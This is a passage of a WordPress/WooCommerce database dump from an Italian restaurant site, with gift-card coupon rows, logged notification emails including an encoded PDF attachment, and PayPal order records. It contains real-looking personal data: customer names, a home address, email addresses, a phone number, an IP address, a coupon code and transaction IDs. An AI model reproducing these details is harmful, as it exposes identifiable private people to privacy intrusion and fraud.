{}'),(37448,3684,'mwb_wgm_giftcard_coupon','3679'),(37449,3684,'mwb_wgm_giftcard_coupon_unique','online'),(37450,3684,'mwb_wgm_giftcard_coupon_product_id','548'),(37451,3684,'mwb_wgm_giftcard_coupon_mail_to','Laura e Matteo'),(37452,3679,'3679#387','a:1:{i:0;s:18:\"solymarcoupon74KG4\";}'),(37453,3685,'solution','All good, mail sent.'),(37454,3685,'success','1'),(37455,3685,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37456,3685,'to_header','matteo.sandri@bahlsen.it'),(37457,3685,'bcc_header','matteo.sandri@bahlsen.it'),(37458,3685,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37459,3685,'original_to','matteo.sandri@bahlsen.it'),(37460,3685,'original_subject','Sol Y Mar'),(37461,3685,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\">\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px;\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 10px 0px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"font-weight: normal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: auto;\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px;\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/12/regala-un-coupon.png\" width=\"100%\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">Buon Natale parents!!!</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Tom e Edo</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Laura e Matteo</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-family: Arial, Helvetica, sans-serif;\"><span class=\"woocommerce-Price-amount amount\"><bdi>100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></bdi></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; border-spacing: 20px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\">\r\n<h2 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\"><img class=\"mwb_wgm_coupon_img\" id=\"1608809229www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1608809229solymarcoupon74KG4.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. 22/06/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n</body>\n</html>\n'),(37462,3685,'original_headers','[\"Bcc:matteo.sandri@bahlsen.it\"]'),(37463,3685,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\nCmVuZG9iago0OCAwIG9iagoxMjM2CmVuZG9iago0NiAwIG9iago8PCAvVHlwZSAvRm9udAov\r\nU3VidHlwZSAvQ0lERm9udFR5cGUyCi9CYXNlRm9udCAvRHJvaWRBcmFiaWNLdWZpCi9DSURT\r\neXN0ZW1JbmZvIDw8IC9SZWdpc3RyeSAoQWRvYmUpIC9PcmRlcmluZyAoSWRlbnRpdHkpIC9T\r\ndXBwbGVtZW50IDAgPj4KL0ZvbnREZXNjcmlwdG9yIDQ0IDAgUgovQ0lEVG9HSURNYXAgL0lk\r\nZW50aXR5Ci9XIFswIFs1OTUgMzM3IF0KXQo+PgplbmRvYmoKNDcgMCBvYmoKPDwgL0xlbmd0\r\naCAzNjggPj4Kc3RyZWFtCi9DSURJbml0IC9Qcm9jU2V0IGZpbmRyZXNvdXJjZSBiZWdpbgox\r\nMiBkaWN0IGJlZ2luCmJlZ2luY21hcAovQ0lEU3lzdGVtSW5mbyA8PCAvUmVnaXN0cnkgKEFk\r\nb2JlKSAvT3JkZXJpbmcgKFVDUykgL1N1cHBsZW1lbnQgMCA+PiBkZWYKL0NNYXBOYW1lIC9B\r\nZG9iZS1JZGVudGl0eS1VQ1MgZGVmCi9DTWFwVHlwZSAyIGRlZgoxIGJlZ2luY29kZXNwYWNl\r\ncmFuZ2UKPDAwMDA+IDxGRkZGPgplbmRjb2Rlc3BhY2VyYW5nZQoyIGJlZ2luYmZyYW5nZQo8\r\nMDAwMD4gPDAwMDA+IDwwMDAwPgo8MDAwMT4gPDAwMDE+IDwwMDIwPgplbmRiZnJhbmdlCmVu\r\nZGNtYXAKQ01hcE5hbWUgY3VycmVudGRpY3QgL0NNYXAgZGVmaW5lcmVzb3VyY2UgcG9wCmVu\r\nZAplbmQKCmVuZHN0cmVhbQplbmRvYmoKNyAwIG9iago8PCAvVHlwZSAvRm9udAovU3VidHlw\r\nZSAvVHlwZTAKL0Jhc2VGb250IC9Ecm9pZEFyYWJpY0t1ZmkKL0VuY29kaW5nIC9JZGVudGl0\r\neS1ICi9EZXNjZW5kYW50Rm9udHMgWzQ2IDAgUl0KL1RvVW5pY29kZSA0NyAwIFI+PgplbmRv\r\nYmoKNDkgMCBvYmoKPDwgL1R5cGUgL0ZvbnREZXNjcmlwdG9yCi9Gb250TmFtZSAvUVhCQUFB\r\nK05pbWJ1c1NhbnMtUmVndWxhcgovRmxhZ3MgNCAKL0ZvbnRCQm94IFstMjEwIC0yOTkgMTAz\r\nMiAxMDc1IF0KL0l0YWxpY0FuZ2xlIDAgCi9Bc2NlbnQgNzI5IAovRGVzY2VudCAtMjcxIAov\r\nQ2FwSGVpZ2h0IDcyOSAKL1N0ZW1WIDUwIAovRm9udEZpbGUyIDUwIDAgUgo+PgplbmRvYmoK\r\nNTAgMCBvYmoKPDwKL0xlbmd0aDEgNDI4OCAKL0xlbmd0aCA1MyAwIFIKL0ZpbHRlciAvRmxh\r\ndGVEZWNvZGUKPj4Kc3RyZWFtCnicjVd7dFNlEv/mu/cmZXmZPhJYXknTJrQhpGlIYh/Q0ndt\r\nm5bQF1ToM+nDpCl9QNMCtYulai1QsaU8FKm6i7EoumX3LHt0dQ+s4hEtakTWP3xwdM+Ku7LH\r\nVVnb3u7cm5Qjun/sl9xkZu7c+eab+c183yVACAkh9xOGkMLNhvi2jj8/gJJH8Kqqd3mdXbN7\r\nLiD9FSELNA2O6jrH8lwdIQvDUWZpQMG8l6VIL8xHPqrB3d7ZO7zga+RbkH/Q5amttpjjBf4W\r\n8lnu6s4WoiGZhCxKRV7ZXO12tK9yvI18FSG0ijC0Bw4RjrD0YVqOGnmBf9hO4sGMPN6aG7Rf\r\ncHtulOSV2UgqUU6x9Br/L/IGawIdmjwparL0bWE2XCFDxmZn2WnOT8KIisQSYlLJLVaLxbpO\r\no7VYNRotflVhMlW8XCFXSKQSiVYlk6nkSEukY3Ss4VSyNQn2DV4GSE5IPtk4M/YK7LA5NEWU\r\nFmkcNv4gXOl5BOCRHli/MWl06/4z1qov7I+Y15lgZg98tHT5hu7u9SuXwEwppdDf5d2PoQfS\r\nNzvJfMQayVJCVDK1TIJDjW4gGS6Xy01yC7oXwXzkg9h8V1p9B/gM5T1FiTVlBVrWOPNk8f7K\r\nePDU0lvTFzPcBVqIMORbRggl98xeYcPZIiIjkTiJYDRCNBcvmKNUGi8XVyWRajQaM8qovm2i\r\ne+PG3RPtLRN704BO/y1nR2EsgM57YMgbA52tbBEUDr/f/9AHhwsKDr/bB0tg7Ykk9+O11aOn\r\nAJ46XnPh6QRhNQcJYT7HeRWEhMlMsnXCdDgTkjiRRhspkZoPjmsLXOmOndQHxvK9+buezWCN\r\n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\r\ntSI0GnWw0SuClRkuEfdnodHfbmUWs4wLIDuQKiYpdbS2ZmznBkjPTB4urhxOV2W12Jrb578g\r\n2dA0tGXXHywrdcsW8tYHHwV4bH+fO2qINR6vrIDSx/29/ZeLcnKhwml1HdmGlV2+LX9XiS47\r\nLXpL23Al09sDf7180Q/w5Im6ix8Fz2aSpejv6p+dze44puH+JnqnDhzWNJkVlsp6EP+3N8A4\r\nnBqxbCnIiY4bcN73xEZx9xtLcOavAfDUz6yYo3c4ZlYw0YeOQag2ZU1JYVnlEcGDGuZ3oObG\r\nhWN8WARuPOaau+1Wbvw6/w8Iuy7uD5NcE+4PQqfTRAkOSCjuOALo2TB1YHu4DXGrWA0KLl/P\r\nf/btkZt2533uptLrj9LIjAsLVfK4ic7WF3vSU7qeb644btSuk7GSb7+pqmjh3/rdef6ye2sJ\r\nAN1U4Fmzvab45KcHDnx+CvdHo17TaBdeGSBwOc+/aKxcnPztj9805sbsTT5NshR9BQFPwYHP\r\nBN4/Qh5CjV2SpaKlH49IisdkrpSMsW2kD6978Dooyl4nJ5AuRXoFvE4GkLbj5aE+MogdNQvl\r\nPNIj+GwN8il4zyz8o/wlpPH+7E38Lw9eV1DXxl4nOtQJR3v9KMuR+MhB7Mo1OFeN6E0uaSdn\r\nyTX83ISt0AsH4H2qoCbaS0fpnxg1s4U5wUwwr7Lz8VxoZ8+wF9gbLM+FcRpuL/cn7h1JWDBW\r\nkSRD6J1B7qdjEXn+ttxyWwfIfOQCNMU62xikGeyxOUGaRZ3aIM2RBaQ5SEtIKOlCTWBxPyIu\r\nfFsN0EDk5FaQpmQRLArSDLHA8iDNkiiwB2mOLIGdQVqC8gOrS+xlMTrdmnRPi7e1sb6hXRkf\r\nZ1ynrPEqg3eUGY62xvpmpQaJnQ6Xp8XtaG63NbprOtqUm6ub2+yO+g5XdSsqJwakglAflCai\r\nMcuPlEsdrW2NnmalcW1c3M+1sQpKiJ2UkRjsbzrcMdOJh7QQL2kljaSeNGDulPieE0eMZB1S\r\nNXhH+ZNnlJgXB2kT9ZuR0wQlO/FyidbcSDWjJRvquNFGB2oryWZSjVJEIN6tR5kL+dag5cQ7\r\ndOc09T/RTQx6Zvm/tEuRaxX99Ih+GslafDru/3n2v2V3F8wKZW5kc3RyZWFtCmVuZG9iago1\r\nMyAwIG9iagozMjAyCmVuZG9iago1MSAwIG9iago8PCAvVHlwZSAvRm9udAovU3VidHlwZSAv\r\nQ0lERm9udFR5cGUyCi9CYXNlRm9udCAvTmltYnVzU2Fucy1SZWd1bGFyCi9DSURTeXN0ZW1J\r\nbmZvIDw8IC9SZWdpc3RyeSAoQWRvYmUpIC9PcmRlcmluZyAoSWRlbnRpdHkpIC9TdXBwbGVt\r\nZW50IDAgPj4KL0ZvbnREZXNjcmlwdG9yIDQ5IDAgUgovQ0lEVG9HSURNYXAgL0lkZW50aXR5\r\nCi9XIFswIFsyNzYgNjYyIDU1MiA1NTIgNTUyIDI3NiA3MTYgNTUyIDI3NiAyMjAgNTUyIDU1\r\nMiAzMzAgNDk2IDI3NiAzMzAgNjYyIDQ5NiA1NTIgNDk2IDI3NiA1NTIgMjc2IDU1MiA1NTIg\r\nNTUyIDMzMCA2MDYgNDk2IDIyMCA1NTIgODI2IDE4OSA3MTYgXQpdCj4+CmVuZG9iago1MiAw\r\nIG9iago8PCAvTGVuZ3RoIDU5NSA+PgpzdHJlYW0KL0NJREluaXQgL1Byb2NTZXQgZmluZHJl\r\nc291cmNlIGJlZ2luCjEyIGRpY3QgYmVnaW4KYmVnaW5jbWFwCi9DSURTeXN0ZW1JbmZvIDw8\r\nIC9SZWdpc3RyeSAoQWRvYmUpIC9PcmRlcmluZyAoVUNTKSAvU3VwcGxlbWVudCAwID4+IGRl\r\nZgovQ01hcE5hbWUgL0Fkb2JlLUlkZW50aXR5LVVDUyBkZWYKL0NNYXBUeXBlIDIgZGVmCjEg\r\nYmVnaW5jb2Rlc3BhY2VyYW5nZQo8MDAwMD4gPEZGRkY+CmVuZGNvZGVzcGFjZXJhbmdlCjIg\r\nYmVnaW5iZnJhbmdlCjwwMDAwPiA8MDAwMD4gPDAwMDA+CjwwMDAxPiA8MDAyMT4gWzwwMDQy\r\nPiA8MDA3NT4gPDAwNkY+IDwwMDZFPiA8MDAyMD4gPDAwNEU+IDwwMDYxPiA8MDA3ND4gPDAw\r\nNkM+IDwwMDY1PiA8MDA3MD4gPDAwNzI+IDwwMDczPiA8MDAyMT4gPDAwMjg+IDwwMDUzPiA8\r\nMDA2Mz4gPDAwNjQ+IDwwMDdBPiA8MDAyRT4gPDAwMzI+IDwwMDJGPiA8MDAzMD4gPDAwMzY+\r\nIDwwMDMxPiA8MDAyOT4gPDAwNTQ+IDwwMDc2PiA8MDA2OT4gPDAwNjc+IDwwMDZEPiA8MDAy\r\nNz4gPDAwNDM+IF0KZW5kYmZyYW5nZQplbmRjbWFwCkNNYXBOYW1lIGN1cnJlbnRkaWN0IC9D\r\nTWFwIGRlZmluZXJlc291cmNlIHBvcAplbmQKZW5kCgplbmRzdHJlYW0KZW5kb2JqCjE4IDAg\r\nb2JqCjw8IC9UeXBlIC9Gb250Ci9TdWJ0eXBlIC9UeXBlMAovQmFzZUZvbnQgL05pbWJ1c1Nh\r\nbnMtUmVndWxhcgovRW5jb2RpbmcgL0lkZW50aXR5LUgKL0Rlc2NlbmRhbnRGb250cyBbNTEg\r\nMCBSXQovVG9Vbmljb2RlIDUyIDAgUj4+CmVuZG9iagoyIDAgb2JqCjw8Ci9UeXBlIC9QYWdl\r\ncwovS2lkcyAKWwo1IDAgUgpdCi9Db3VudCAxCi9Qcm9jU2V0IFsvUERGIC9UZXh0IC9JbWFn\r\nZUIgL0ltYWdlQ10KPj4KZW5kb2JqCnhyZWYKMCA1NAowMDAwMDAwMDAwIDY1NTM1IGYgCjAw\r\nMDAwMDAwMDkgMDAwMDAgbiAKMDAwMDIxNjU0MSAwMDAwMCBuIAowMDAwMDAwMTYzIDAwMDAw\r\nIG4gCjAwMDAwMDAyNTggMDAwMDAgbiAKMDAwMDE5NzgzMSAwMDAwMCBuIAowMDAwMjA5MzM1\r\nIDAwMDAwIG4gCjAwMDAyMTE3MjcgMDAwMDAgbiAKMDAwMDAwMDI5NSAwMDAwMCBuIAowMDAw\r\nMDAxODkxIDAwMDAwIG4gCjAwMDAwMDE5MTEgMDAwMDAgbiAKMDAwMDAxMzYwOSAwMDAwMCBu\r\nIAowMDAwMDEzNjMxIDAwMDAwIG4gCjAwMDAwMTU0MDMgMDAwMDAgbiAKMDAwMDAxNTQyNCAw\r\nMDAwMCBuIAowMDAwMDE3MzE0IDAwMDAwIG4gCjAwMDAwMTczMzUgMDAwMDAgbiAKMDAwMDE5\r\nNDY3NyAwMDAwMCBuIAowMDAwMjE2Mzk2IDAwMDAwIG4gCjAwMDAyMDI2NjQgMDAwMDAgbiAK\r\nMDAwMDE5NDcwMCAwMDAwMCBuIAowMDAwMTk3MDUzIDAwMDAwIG4gCjAwMDAxOTcwNzQgMDAw\r\nMDAgbiAKMDAwMDE5NzExOSAwMDAwMCBuIAowMDAwMTk3MTcxIDAwMDAwIG4gCjAwMDAxOTcz\r\nNjQgMDAwMDAgbiAKMDAwMDE5NzY2NCAwMDAwMCBuIAowMDAwMTk3NDI4IDAwMDAwIG4gCjAw\r\nMDAxOTc1NDAgMDAwMDAgbiAKMDAwMDE5NzcyNyAwMDAwMCBuIAowMDAwMTk4MjMyIDAwMDAw\r\nIG4gCjAwMDAxOTk3MTkgMDAwMDAgbiAKMDAwMDE5Nzk1MyAwMDAwMCBuIAowMDAwMTk4MjA1\r\nIDAwMDAwIG4gCjAwMDAxOTk3NDAgMDAwMDAgbiAKMDAwMDE5OTk1MCAwMDAwMCBuIAowMDAw\r\nMjAxODc1IDAwMDAwIG4gCjAwMDAyMDIxNTAgMDAwMDAgbiAKMDAwMDIwMTg1NCAwMDAwMCBu\r\nIAowMDAwMjAyODA2IDAwMDAwIG4gCjAwMDAyMDMwNjYgMDAwMDAgbiAKMDAwMDIwODU0MCAw\r\nMDAwMCBuIAowMDAwMjA4ODE0IDAwMDAwIG4gCjAwMDAyMDg1MTkgMDAwMDAgbiAKMDAwMDIw\r\nOTQ3MSAwMDAwMCBuIAowMDAwMjA5NzM2IDAwMDAwIG4gCjAwMDAyMTEwODQgMDAwMDAgbiAK\r\nMDAwMDIxMTMwNyAwMDAwMCBuIAowMDAwMjExMDYzIDAwMDAwIG4gCjAwMDAyMTE4NjggMDAw\r\nMDAgbiAKMDAwMDIxMjA4MSAwMDAwMCBuIAowMDAwMjE1Mzk1IDAwMDAwIG4gCjAwMDAyMTU3\r\nNDkgMDAwMDAgbiAKMDAwMDIxNTM3NCAwMDAwMCBuIAp0cmFpbGVyCjw8Ci9TaXplIDU0Ci9J\r\nbmZvIDEgMCBSCi9Sb290IDI5IDAgUgo+PgpzdGFydHhyZWYKMjE2NjM5CiUlRU9GCg==\r\n--=_906213098d8f975113e3f9c85b3e654a--\r\n.\r\n250 OK queued as d298d085-ce55-4f64-a4b7-5fc8f513b9ab\r\n'),(37464,3679,'mwb_wgm_order_giftcard','send'),(37465,3686,'_order_key','wc_order_33uMUgOXrhPv3'),(37466,3686,'_customer_user','0'),(37467,3686,'_payment_method','paypal'),(37468,3686,'_payment_method_title','PayPal'),(37469,3686,'_customer_ip_address','87.11.242.157'),(37470,3686,'_customer_user_agent','Mozilla/5.0 (Linux; Android 11; SM-G986B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36'),(37471,3686,'_created_via','checkout'),(37472,3686,'_cart_hash','7840ac78329bc71bd1a89fee1a03baa6'),(37473,3686,'_billing_first_name','Elena'),(37474,3686,'_billing_last_name','Valentini'),(37475,3686,'_billing_address_1','Via Napoli 19'),(37476,3686,'_billing_city','Riccione'),(37477,3686,'_billing_state','RN'),(37478,3686,'_billing_postcode','47838'),(37479,3686,'_billing_country','IT'),(37480,3686,'_billing_email','c.lorenzetti@inwind.it'),(37481,3686,'_billing_phone','3382950071'),(37482,3686,'_order_currency','EUR'),(37483,3686,'_cart_discount','0'),(37484,3686,'_cart_discount_tax','0'),(37485,3686,'_order_shipping','0.00'),(37486,3686,'_order_shipping_tax','0'),(37487,3686,'_order_tax','0'),(37488,3686,'_order_total','200.00'),(37489,3686,'_order_version','4.8.0'),(37490,3686,'_prices_include_tax','no'),(37491,3686,'_billing_address_index','Elena Valentini  Via Napoli 19  Riccione RN 47838 IT c.lorenzetti@inwind.it 3382950071'),(37492,3686,'_shipping_address_index','        '),(37493,3686,'is_vat_exempt','no'),(37494,3687,'_order_key','wc_order_53x9uuPs57fbY'),(37495,3687,'_customer_user','0'),(37496,3687,'_payment_method','paypal'),(37497,3687,'_payment_method_title','PayPal'),(37498,3687,'_customer_ip_address','87.11.242.157'),(37499,3687,'_customer_user_agent','Mozilla/5.0 (Linux; Android 11; SM-G986B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36'),(37500,3687,'_created_via','checkout'),(37501,3687,'_cart_hash','2f9918c44a9ae509807961bc1dd9d143'),(37502,3687,'_billing_first_name','Elena'),(37503,3687,'_billing_last_name','Valentini'),(37504,3687,'_billing_address_1','Via Napoli 19'),(37505,3687,'_billing_city','Riccione'),(37506,3687,'_billing_state','RN'),(37507,3687,'_billing_postcode','47838'),(37508,3687,'_billing_country','IT'),(37509,3687,'_billing_email','c.lorenzetti@inwind.it'),(37510,3687,'_billing_phone','3382950071'),(37511,3687,'_order_currency','EUR'),(37512,3687,'_cart_discount','0'),(37513,3687,'_cart_discount_tax','0'),(37514,3687,'_order_shipping','0.00'),(37515,3687,'_order_shipping_tax','0'),(37516,3687,'_order_tax','0'),(37517,3687,'_order_total','100.00'),(37518,3687,'_order_version','4.8.0'),(37519,3687,'_prices_include_tax','no'),(37520,3687,'_billing_address_index','Elena Valentini  Via Napoli 19  Riccione RN 47838 IT c.lorenzetti@inwind.it 3382950071'),(37521,3687,'_shipping_address_index','        '),(37522,3687,'is_vat_exempt','no'),(37523,3687,'Payment type','instant'),(37524,3687,'_transaction_id','7MB93564L55021110'),(37525,3687,'_paypal_status','completed'),(37526,3687,'PayPal Transaction Fee','3.75'),(37527,3687,'_date_paid','1608820221'),(37528,3687,'_paid_date','2020-12-24 15:30:21'),(37529,3687,'_download_permissions_granted','yes'),(37530,3687,'_recorded_sales','yes'),(37531,3687,'_recorded_coupon_usage_counts','yes'),(37532,3687,'_order_stock_reduced','yes'),(37533,3688,'solution','All good, mail sent.'),(37534,3688,'success','1'),(37535,3688,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37536,3688,'to_header','notifiche@ristorantesolymar.it'),(37537,3688,'reply_to_header','Elena Valentini <c.lorenzetti@inwind.it>'),(37538,3688,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37539,3688,'original_to','notifiche@ristorantesolymar.it'),(37540,3688,'original_subject','[Sol Y Mar] Prenotazione da nuovo cliente (3687) - 24 December 2020'),(37541,3688,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" 